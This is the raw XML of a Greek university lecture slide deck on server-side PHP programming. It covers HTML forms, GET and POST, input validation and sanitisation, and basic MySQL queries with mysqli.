            <a:ext cx="4937760" cy="369417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26F14062-7614-55D3-7404-CBBB4AFC411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B451A7D2-6D19-43FF-A1C1-E3FC0D65A2C5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/3/2025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17D8C23B-9771-1E32-A311-EA8206D13B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4D3C0309-27FC-ECCA-3BF4-B11DB20AD96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28342B8-6363-4D91-9724-0DF11AC94F0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91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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B68712C-73BA-4C99-F797-CF41D7E944A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558204" y="0"/>
            <a:ext cx="11167448" cy="2018803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9528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2C7E453B-0446-657D-5AAF-08B30D23284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solidFill>
            <a:srgbClr val="FFFFFF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918A9DF-0C27-1493-30BB-DF6266360ADF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498832" y="787353"/>
            <a:ext cx="128016" cy="704088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5B5F128-B5D3-919A-A195-663F420E86C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436985F-89E2-8566-A1C5-659FFD720C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115568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5CED3B08-8E0F-5541-3E11-1201B5825243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1115568" y="3203691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C4B9DA70-3DAE-1C29-9EFF-30DD1A868BD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345936" y="2372648"/>
            <a:ext cx="4937760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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5040413-B57A-4F90-B0E1-C4D40E59FD04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345936" y="3203682"/>
            <a:ext cx="4937760" cy="296850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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61457B1C-E35E-9140-48B3-9E227A99E10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1115568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DB5CD9FC-C3E0-4CCC-B85D-EB401008A2F5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/3/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5251EE44-481B-A0F7-C2AD-09DADC59085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12" name="Slide Number Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC502956-F5D2-B598-6E3A-702BC6F6B0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8540496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5E8905B1-24F0-4CB4-9F21-CFEEF5B526C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249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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E2D870E-EF4B-86F0-77AB-36D581ED27C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665856" y="1533521"/>
            <a:ext cx="10917067" cy="3790946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71A6F5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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17379EB3-D910-53C8-4363-BCE437B3C04F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609081" y="2971800"/>
            <a:ext cx="128016" cy="91440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0760764-F6D5-0183-CFA8-AD51752F37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/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5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304CA21B-A904-2303-E8B7-204368828D0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461A30-3A5F-4957-8201-8227A20FF186}" type="datetime1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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815895AD-6283-22E7-54AE-BA5E4036884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7" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4BCC32D-2A88-48F5-552A-C35C5FC4E9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4D5C596-286A-49DD-AE62-F7CA39D45B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726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A271E8-88AC-350B-0AEC-E7B0AB0010AC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44127B7-0316-41F1-B8D3-684E58D4605E}" type="datetime1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FABEA-7F5F-CBFE-9B27-1EE63786E40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6C2C9-DDA6-6F34-269D-3EF53EDD50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8246E78-0687-4284-9504-B27FA8DD192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7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E9B5E84D-09D1-0D33-8A57-437EFA92365F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6312EABD-71B9-C8DC-832E-0C98BB2637A3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352C9A6-7205-7B11-B1F4-38E7DCFFD74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B59D0BD6-841F-0949-20BE-76702D89214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965192" y="1709928"/>
            <a:ext cx="6729983" cy="4096512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7E9642F-978C-2483-7CA8-C657D6BC392E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29000"/>
            <a:ext cx="3099815" cy="2066544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C1268D21-1EAC-A549-16ED-FB028EA884D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40452DFD-8287-4665-BA5A-1E8007F84489}" type="datetime1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61DEA50C-138B-D1AB-A149-C1EFE87B6CEE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9B52CB39-DC06-1319-C71F-C0FFE8190E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B54C15-7023-42EB-A1FA-1EE6BF8BCDBA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701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8CFDC4AC-FDD3-BDE2-CE9C-56C5902762A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558213" y="1162028"/>
            <a:ext cx="3740737" cy="464334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E4E5F3"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="38096" dir="2700000" algn="tl">
              <a:srgbClr val="D9D9D9">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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3" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F93A9A-283E-C60B-922C-39E185F785EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498832" y="1618378"/>
            <a:ext cx="146304" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4A66AC"/>
          </a:solidFill>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"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715FD07-436C-8F50-D85D-FE2F1E36520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8680" y="1709928"/>
            <a:ext cx="3099815" cy="1709928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="34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8253DCAA-13C7-6D98-3009-2CF4602732B1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4965192" y="1161288"/>
            <a:ext cx="6729983" cy="464515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icon to add picture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FBAC3BD3-587C-952C-7943-F1DD06E3C5BA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68680" y="3438144"/>
            <a:ext cx="3099815" cy="2057400"/>
          </a:xfr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A1E0BC07-4C9D-0EA6-6E92-03303B9BB79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>
          <a:xfrm>
            <a:off x="868680" y="6356351"/>
            <a:ext cx="2743200" cy="365129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{E0DB4AC0-3697-4839-A4B4-B7909F019F7F}" type="datetime1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D0C5333-6517-F058-26D1-59EE2F79561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4027DC1D-6CFB-0076-354E-C97B3F6CB0A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2500528-09B1-4C5A-B5F7-A99D5506597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5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28271C-3EA9-1C25-F915-271F10C7A95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33019-B20D-39F8-DA5A-57D87D5C0AA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1A2200-9BEA-24D1-1AAA-C6D11D5F2B41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AF0CF75A-DA92-46AA-967B-58FF73C93E7D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/3/2025</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Bremen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E37E5-CFD3-BED4-9620-591917B3DD52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r>
              <a:rPr lang="en-US"/>
              <a:t>MOCAST 2022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3C458-7E07-3809-F914-4842101A676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US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{502FA967-5724-45FF-9DCE-6D9303B5567E}" type="slidenum"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</p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" fontAlgn="auto" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="11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1pPr>
      <a:lvl2pPr marL="685800" marR="0" lvl="1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2pPr>
      <a:lvl3pPr marL="1143000" marR="0" lvl="2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3pPr>
      <a:lvl4pPr marL="1600200" marR="0" lvl="3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4pPr>
      <a:lvl5pPr marL="2057400" marR="0" lvl="4" indent="-228600" algn="l" defTabSz="914400" rtl="0" fontAlgn="auto" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="11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Avenir Next LT Pro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D23A2-0EB1-4C75-C909-53C9BF300FA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304806" y="792858"/>
            <a:ext cx="11143344" cy="1171024"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/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Μάθημα 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" sz="48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Προγραμματισμός στην πλευρά του εξυπηρετητή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FCDEF0-576C-A6EB-7968-9F1CFB033831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04806" y="2098713"/>
            <a:ext cx="11036808" cy="5071015"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Τμήμα Πληροφορικής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Σχολή Θετικών Επιστημών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Πανεπιστήμιο Δυτικής Μακεδονίας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Καστοριά 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Ρέκκας Βασίλειος-Παναγιώτης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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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vrekkas@physics.auth.gr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0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>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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955966-38DD-D775-6111-2BC5ADF5A4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8C0B7-47E5-D74B-EE99-4DFB7EFEAAE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HTML φόρμας και υποβολή σε PHP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3A06EB0-53A9-829B-72D9-4A35613E4CD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E2959BE-CD68-BA1E-241B-8CB40750A72E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575904" y="1587539"/>
            <a:ext cx="10580915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&lt;form action="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process.php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method="get"&gt;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&lt;input type="text" name="name" placeholder="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Όνομα"&gt;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 type="text" name="email" placeholder="Email"&gt;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&lt;input type="text" name="contact" placeholder="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Τηλέφωνο"&gt;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 type="submit" value="Submit"&gt;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&lt;/form&gt;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φόρμα επιτρέπει στον χρήστη να καταχωρεί στοιχεία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submit:τα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δεδομένα συσκευάζονται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αποστέλλονται στο αρχείο που δηλώνεται στο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η PHP τα επεξεργάζεται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φόρμες αποτελούν την κύρια πηγή εισόδου δεδομένων σε μια εφαρμογή, επομένως ο έλεγχος και η προστασία είναι απαραίτητοι</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1621159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378A89-FE59-161D-825B-5AD151906E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CE32D0-8764-141A-492A-905A00245C1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Επεξεργασία δεδομένων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0356DD8-BF21-EE12-C603-E73DD43EE3F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940CC6-6B59-333F-BF5B-91FE2C26F00D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405082" y="2069859"/>
            <a:ext cx="1058091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Εάν φόρμα χρησιμοποιεί μέθοδο GET,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πληροφορίες μέσα από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URL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process.php?name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Giannis&amp;email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test@mail.com&amp;contact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=6987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χρησιμοποιείται κυρίως όταν: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$name = $_GET['name’];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$email = $_GET['email’];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$contact = $_GET['contact'];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163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497E8-BBA8-B56A-C6A5-F800E8E37B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61FFA-BDC2-113B-E904-ACBB7E391A6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Επεξεργασία δεδομένων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11C5B4E-9934-8B13-22FC-4D86405DBCA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9F5E11-DAC3-743C-0E8A-D31C758A8262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374937" y="2079907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χρησιμοποιείται κυρίως όταν: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δεδομένα δεν είναι ευαίσθητα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Θέλουμε οι σύνδεσμοι να μπορούν να κοινοποιηθούν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ενέργεια δεν αλλάζει δεδομένα (ιδανικό για αναζήτηση)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 δεν πρέπει να χρησιμοποιείται για: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κωδικούς πρόσβασης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στοιχεία πληρωμών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ευαίσθητες πληροφορίες,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Επειδή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εμφανίζονται στο URL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986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F1D62-4C39-1E7D-6D27-3F131DCEB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2890C-D9A2-99A0-7281-9B49EB4C264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Επεξεργασία δεδομένων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07B5FE3-CB84-60BD-1286-4EFB0369B3B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0DC8D9-AC38-3657-6EDB-2D4E1C7BD7A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405082" y="1868892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Στις περιπτώσεις όπου απαιτείται ασφάλεια ή όπου ο χρήστης εισάγει περισσότερα δεδομένα, χρησιμοποιείται η μέθοδος POST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τιμές δεν εμφανίζονται στο URL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Μπορεί να σταλεί μεγάλου μεγέθους περιεχόμενο (π.χ. κείμενα, αρχεία)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κατάλληλη για φόρμες εγγραφής,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login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αποθήκευση δεδομένων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κτλ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anose="05000000000000000000" pitchFamily="2" charset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PHP ανακτά τα στοιχεία ως εξής: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$name = $_POST['name'];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$email = $_POST['email'];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$contact = $_POST['contact'];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 απαιτεί πάντα έλεγχο εγκυρότητας και ασφάλειας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πιθανό σημείο επίθεσης</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32951029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6E0CF-FF70-BD8D-ACDA-5419414B28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0A298-4227-E834-BAF6-9BF06982956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Έλεγχος εγκυρότητας εισόδου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validation)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E6C2A9D-2816-1039-97BA-CA17996BCF2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705D74B-1A2B-A596-8FE9-28082EC855FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324695" y="2150246"/>
            <a:ext cx="10580915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Πριν χρησιμοποιηθούν τα δεδομένα που έστειλε ο χρήστης, πρέπει να εξεταστούν προσεκτικά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έλεγχος αυτός αποσκοπεί στο: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εντοπιστούν κενές ή λανθασμένες εισαγωγές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αποτραπεί η εισαγωγή HTML ή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JavaScript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(XSS)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εμποδιστεί η αποστολή SQL εντολών μέσω INJECTION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εξασφαλιστεί ότι η εφαρμογή επεξεργάζεται μόνο νόμιμες τιμές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Ελλιπής επαλήθευση δεδομένων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από τις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συνηθέστερες αιτίες παραβίασης ιστοσελίδων</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="703231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598EA4-0D32-DB6E-AA6D-31E885A07D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A7A53-D919-1A99-1112-23EE804EFEA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Καθαρισμός εισόδου χρήστη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Sanitization)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505B80F-1232-ABDB-F87E-C5D43D27E0D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47EBA3-B208-B4B3-963E-D8008F31E82D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324695" y="2150246"/>
            <a:ext cx="1058091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καθαρισμός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πρώτη γραμμή άμυνας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Πριν αποθηκευτεί ή χρησιμοποιηθεί τιμή που προέρχεται από GET ή POST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καθαρισμός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 μια διαδικασία όπως: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sanit_input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($data)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$data = trim($data);              //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αφαιρεί αρχικά/τελικά κενά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$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stripslashes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($data);      //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αφαιρεί χαρακτήρες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escape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$data = htmlspecialchars($data);  //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μετατρέπει επικίνδυνα σύμβολα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 $data;}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Τίποτα από το περιεχόμενο δεν μπορεί να εκτελεστεί στον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ως κώδικας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αποκτά ασφαλή μορφή για εμφάνιση ή προσωρινή αποθήκευση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εφαρμογή είναι λιγότερο ευάλωτη σε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scripting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επιθέσεις</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2758134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E3DFF-94A6-F05A-8706-822B313F76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84308-6722-7392-5B7D-5B73170158B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Καθαρισμός εισόδου χρήστη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Sanitization)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7D2708C-37F5-A82A-F065-01ADAE1EC87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8DECCC-62D8-78E0-8116-6B1F1A359D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324695" y="2150246"/>
            <a:ext cx="1058091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καθαρισμός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πρώτη γραμμή άμυνας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Πριν αποθηκευτεί ή χρησιμοποιηθεί τιμή που προέρχεται από GET ή POST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καθαρισμός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 μια διαδικασία όπως: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sanit_input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($data)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$data = trim($data);              //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αφαιρεί αρχικά/τελικά κενά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$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stripslashes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($data);      //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αφαιρεί χαρακτήρες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escape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$data = htmlspecialchars($data);  //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μετατρέπει επικίνδυνα σύμβολα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return $data;}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Τίποτα από το περιεχόμενο δεν μπορεί να εκτελεστεί στον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ως κώδικας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αποκτά ασφαλή μορφή για εμφάνιση ή προσωρινή αποθήκευση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εφαρμογή είναι λιγότερο ευάλωτη σε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scripting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επιθέσεις</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23211330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B1362-94F2-D6B2-2495-F66BBCC73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A77BC-2016-78D9-D3A4-6A7CCF41586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Σύνδεση PHP με βάση δεδομένων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MySQL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1FB1412-206B-37C7-15EB-D50902B3205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388370-46BD-145A-DA71-B29980DCA0C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294549" y="2027887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επόμενο στάδιο στις δυναμικές εφαρμογές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σύνδεση με μια βάση δεδομένων</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl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 τον κατάλληλο συνδυασμό παραμέτρων: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Όνομα server φιλοξενίας βάσης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Όνομα βάσης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Όνομα χρήστη της βάσης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Συνθηματικό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password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σύνδεσης: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$conn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($host, $user, $password, $database);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if(!$conn)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die("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Αποτυχία σύνδεσης: " .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mysqli_connect_error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());}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mysqli_set_charset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($conn, 'utf8’);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ορισμός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charset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εξασφαλίζει ότι δεδομένα θα αποθηκεύονται και θα ανακτώνται σωστά, ανεξάρτητα από τη γλώσσα.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31980475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78872-7EA9-083D-8517-FAB443EB7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8DE01-E141-4359-C805-FD138498B18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Εκτέλεση ερωτημάτων στη βάση δεδομένων (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Queries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187ABF5-0F3E-D221-E42D-C7FCC41AE83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9CEDAC-0DDE-2762-AF9C-522CF1988E13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294549" y="2027887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 επιτρέπει την εκτέλεση SQL ερωτημάτων μέσω της συνάρτησης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mysqli_query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ανάκτησης όλων των εγγραφών από πίνακα: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 = "SELECT * FROM classics";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mysqli_query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($conn, $query);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Εάν κατά την εκτέλεση παρουσιαστεί σφάλμα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άμεσος εντοπισμός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με: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if(!$result)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die("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Σφάλμα εκτέλεσης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SQL: " .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mysqli_connect_error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4607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A64DDB-A429-E1AD-E593-5DACD92A3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DFA8D-26F5-255D-960D-266EC3B7085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Ανάκτηση δεδομένων από βάση σε εφαρμογή PHP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ED47622-21EF-ABB6-40C8-5E13EBCCB68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19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4BC782E-7B6D-CA5D-68BF-308620F29ABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294549" y="2027887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ανάκτηση δεδομένων αποτελεί την καρδιά των δυναμικών ιστοσελίδων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Κάθε σύστημα που διαχειρίζεται πληροφορίες (λίστες προϊόντων, χρήστες, σχόλια, κρατήσεις, μηνύματα, αρχεία) χρειάζεται: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συνδεθεί στη βάση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εκτελέσει μια SQL εντολή SELECT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πάρει τις σειρές που επέστρεψε ο server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τις μετατρέψει σε μορφή κατάλληλη για HTML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τις παρουσιάσει στον χρήστη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Αυτό το μοτίβο επαναλαμβάνεται σε κάθε εφαρμογή : βάση είναι αποθήκη, η PHP ο μηχανισμός ανάγνωσης, και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το μέσο προβολής</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="784698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4A0332-B425-4881-2DE1-C9C0B67414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001AB3-A65E-47DB-6AEA-AF8B89F526F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83D725E-847D-D84C-7CE5-54A987CADA7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2F63D91-CDD6-6DE7-BF41-EB9D06FF0C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366422" y="2101954"/>
            <a:ext cx="10168128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ώριμη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ευέλικτη γλώσσα προγραμματισμού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εκτελείται στον εξυπηρετητή (server)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Βασικός σκοπός  δημιουργία δυναμικού περιεχομένου  που μπορεί να αλλάζει ανάλογα με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τις ενέργειες του χρήστη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δεδομένα της βάσης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τη λογική της εφαρμογής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λειτουργεί ως ο «εγκέφαλος» της διαδικτυακής εφαρμογής: λαμβάνει δεδομένα από τον χρήστη, τα αναλύει, εκτελεί ενέργειες και επιστρέφει το αποτέλεσμα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C03059-05D3-6668-ED7A-DDDBC46E92D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9158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6E3C69-562C-C62A-063C-5622B9E91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73723-D7AF-F45E-79D6-D082AD6CB09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Ανάκτηση δεδομένων από βάση σε εφαρμογή PHP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27293A1-F839-31F0-E5FD-EC52EE9C954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79B11B-E27F-DD62-6444-6FB5747697C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294549" y="2027887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ανάκτηση δεδομένων αποτελεί την καρδιά των δυναμικών ιστοσελίδων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Κάθε σύστημα που διαχειρίζεται πληροφορίες (λίστες προϊόντων, χρήστες, σχόλια, κρατήσεις, μηνύματα, αρχεία) χρειάζεται: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συνδεθεί στη βάση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εκτελέσει μια SQL εντολή SELECT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πάρει τις σειρές που επέστρεψε ο server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τις μετατρέψει σε μορφή κατάλληλη για HTML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τις παρουσιάσει στον χρήστη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Αυτό το μοτίβο επαναλαμβάνεται σε κάθε εφαρμογή : βάση είναι αποθήκη, η PHP ο μηχανισμός ανάγνωσης, και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το μέσο προβολής</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3219443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0582DB-BBEB-AFB4-357D-B8EE8ECD2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B4473-AF90-5F9B-12F5-4A2765A4F0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Το αντικείμενο αποτελεσμάτων (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CB1356E-E60A-8799-2A35-E42886E7EB4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0D0C3D-EA3F-AB7D-4661-AA3B55B8E222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606048" y="1529110"/>
            <a:ext cx="10580915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Όταν εκτελείται ένα ερώτημα SELECT:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1657350" lvl="3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mysqli_query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($conn, $query);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μεταβλητή $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δεν περιέχει τα δεδομένα “σαν πίνακα”, αλλά ένα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Περιέχει πληροφορίες για τον αριθμό των σειρών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Διατηρεί έναν εσωτερικό δείκτη που "δείχνει" στην τρέχουσα γραμμή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Συμπεριφέρεται σαν ροή δεδομένων που διαβάζεται σειριακά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Παρέχει μεθόδους για ανάκτηση κάθε γραμμής με διάφορες μορφές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PHP δεν φορτώνει όλο το αποτέλεσμα στη μνήμη ταυτόχρονα, για αποδοτικότητα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κάθε γραμμή ανακτάται σταδιακά καθώς τη ζητάμε</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27122408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4251B4-3DB5-D265-9E14-4E36A43AA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3896B-9FB5-E820-370F-7E06AC69E04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fetch_assoc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5B48B37-319A-3045-AA77-AB8CA69B3BF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E70359-598F-0D1F-1A08-4E71A82F0F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405081" y="2149019"/>
            <a:ext cx="1058091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$row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mysqli_fetch_assoc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($result);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επιστρέφει μία γραμμή από το αποτέλεσμα σε μορφή συσχετιστικού πίνακα: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"title" =&gt; "Moby Dick",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"author" =&gt; "Melville",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"year" =&gt; "1851"]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Κάθε κλήση της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fetch_assoc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() προχωρά τον εσωτερικό δείκτη στην επόμενη εγγραφή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Όταν δεν υπάρχει άλλη γραμμή, η συνάρτηση επιστρέφει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null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8577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811FB1-A272-F21B-5422-78BE21C83F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619EA-8F10-C23F-34EA-188227B7FC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μέθοδος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fetch_assoc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9672FA5-CC1F-A237-3554-B08C6F67DB3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9135245-5FF1-8311-4B44-D9158B9A0280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405081" y="2149019"/>
            <a:ext cx="10580915" cy="25699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Πλεονέκτημα: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Επιτρέπει πρόσβαση με ονόματα πεδίων αντί για αριθμητικά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indices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Κάνει τον κώδικα πιο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σαφή:echo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$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row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['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author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’];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η συνηθέστερη πρακτική σε εφαρμογές PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
